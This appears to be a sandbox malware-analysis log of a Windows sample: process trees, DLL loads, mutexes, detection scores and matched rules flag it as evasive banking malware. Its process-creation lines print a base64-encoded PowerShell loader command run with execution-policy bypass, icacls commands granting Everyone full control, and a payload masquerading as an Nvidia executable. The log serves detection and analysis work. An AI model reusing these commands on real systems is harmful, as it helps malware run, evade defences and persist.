Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3420ACD32_2_00007FFD3420ACD3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3420FD682_2_00007FFD3420FD68
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3420FDCD2_2_00007FFD3420FDCD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34221EFA2_2_00007FFD34221EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34208EFA2_2_00007FFD34208EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34210EFA2_2_00007FFD34210EFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34203BA52_2_00007FFD34203BA5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3459346E2_2_00007FFD3459346E
Source: RcFBMph6zu.exe, 00000000.00000000.2187348828.00000000004D0000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameDASMEI.exe0 vs RcFBMph6zu.exe
Source: RcFBMph6zu.exe, 00000000.00000002.4642184264.0000000000AB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE vs RcFBMph6zu.exe
Source: RcFBMph6zu.exe, 00000000.00000002.4642184264.0000000000AB3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowe vs RcFBMph6zu.exe
Source: RcFBMph6zu.exeBinary or memory string: OriginalFilenameDASMEI.exe0 vs RcFBMph6zu.exe
Source: RcFBMph6zu.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: amsi64_7108.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.bank.evad.winEXE@13/16@1/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD342183A0 CoCreateInstance,2_2_00007FFD342183A0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3488:120:WilError_03
Source: C:\Nvidia-48001\Nvidia-48001.exeMutant created: \Sessions\1\BaseNamedObjects\4DBD01682024
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_thiz13au.hvj.ps1Jump to behavior
Source: RcFBMph6zu.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Nvidia-48001\Nvidia-48001.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Nvidia-48001\Nvidia-48001.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: RcFBMph6zu.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Users\user\Desktop\RcFBMph6zu.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: RcFBMph6zu.exeVirustotal: Detection: 23%
Source: RcFBMph6zu.exeReversingLabs: Detection: 23%
Source: unknownProcess created: C:\Users\user\Desktop\RcFBMph6zu.exe "C:\Users\user\Desktop\RcFBMph6zu.exe"
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-48001 /grant Everyone:F /T /C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-48001\Nvidia-48001.exe /grant Everyone:F /T /C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-48001\Nvidia-48001.exe "C:\Nvidia-48001\Nvidia-48001.exe"
Source: unknownProcess created: C:\Nvidia-48001\Nvidia-48001.exe "C:\Nvidia-48001\Nvidia-48001.exe"
Source: C:\Users\user\Desktop\RcFBMph6zu.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\windowspowershell\v1.0\powershell.exe" -sta -noprofile -executionpolicy bypass -encodedcommand JAB4AD0AJwA1AGYAYgA2ADgAOQA1ADAALQA5AGEAYgBlAC0ANABhADkAMQAtADgAZABmADcALQA5ADIANQBjADQANAAxADgAMwBlAGUAMgAnADsAJAB5AD0AJwBDADoAXABVAHMAZQByAHMAXABlAG4AZwBpAG4AZQBlAHIAXABEAGUAcwBrAHQAbwBwAFwAUgBjAEYAQgBNAHAAaAA2AHoAdQAuAGUAeABlACcAOwB0AHIAeQAgAHsADQAKACAAIABpAGYAIAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGcAZQAgADQAKQANAAoAIAAgAHsAIAAkAG4AdQBsAGwAIAA9ACAAWwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AFUAbgBzAGEAZgBlAEwAbwBhAGQARgByAG8AbQAoACQAeQApACAAfQAgAGUAbABzAGUAIAB7ACAAJABuAHUAbABsACAAPQAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkAEYAaQBsAGUAKAAkAHkAKQB9AA0ACgAgACAALgAgACgAWwBfADMAMgAuAF8AOAA4AF0AOgA6AF8ANwA0ACgAJAB4ACkAKQANAAoAIAAgAGUAeABpAHQAIAAkAEwAQQBTAFQARQBYAEkAVABDAE8ARABFAA0ACgB9ACAADQAKAGMAYQB0AGMAaAAgAFsATgBvAHQAUwB1AHAAcABvAHIAdABlAGQARQB4AGMAZQBwAHQAaQBvAG4AXQANAAoAewANAAoAIAAgAFcAcgBpAHQAZQAtAEgAbwBzAHQAIAAnAEEAcABwAGwAaQBjAGEAdABpAG8AbgAgAGwAbwBjAGEAdABpAG8AbgAgAGkAcwAgAHUAbgB0AHIAdQBzAHQAZQBkAC4AIABDAG8AcAB5ACAAZgBpAGwAZQAgAHQAbwAgAGEAIABsAG8AYwBhAGwAIABkAHIAaQB2AGUALAAgAGEAbgBkACAAdAByAHkAIABhAGcAYQBpAG4ALgAnACAALQBGAG8AcgBlAGcAcgBvAHUAbgBkAEMAbwBsAG8AcgAgAFIAZQBkAA0ACgB9AA0ACgBjAGEAdABjAGgAIAB7AA0ACgAgACAAVwByAGkAdABlAC0ASABvAHMAdAAgACgAIgBFAHIAcgBvAHIAOgAgACIAIAArACAAJABfAC4ARQB4AGMAZQBwAHQAaQBvAG4ALgBNAGUAcwBzAGEAZwBlACkAIAAtAEYAbwByAGUAIABSAGUAZAAgAA0ACgB9AA==Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-48001 /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\icacls.exe "C:\Windows\system32\icacls.exe" C:\Nvidia-48001\Nvidia-48001.exe /grant Everyone:F /T /CJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Nvidia-48001\Nvidia-48001.exe "C:\Nvidia-48001\Nvidia-48001.exe" Jump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\RcFBMph6zu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\icacls.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: python313.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: magnification.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: version.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wsock32.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wtsapi32.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: d3d9.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: wldp.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: netutils.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: security.dllJump to behavior
Source: C:\Nvidia-48001\Nvidia-48001.exeSection loaded: secur32.dllJump to behavior
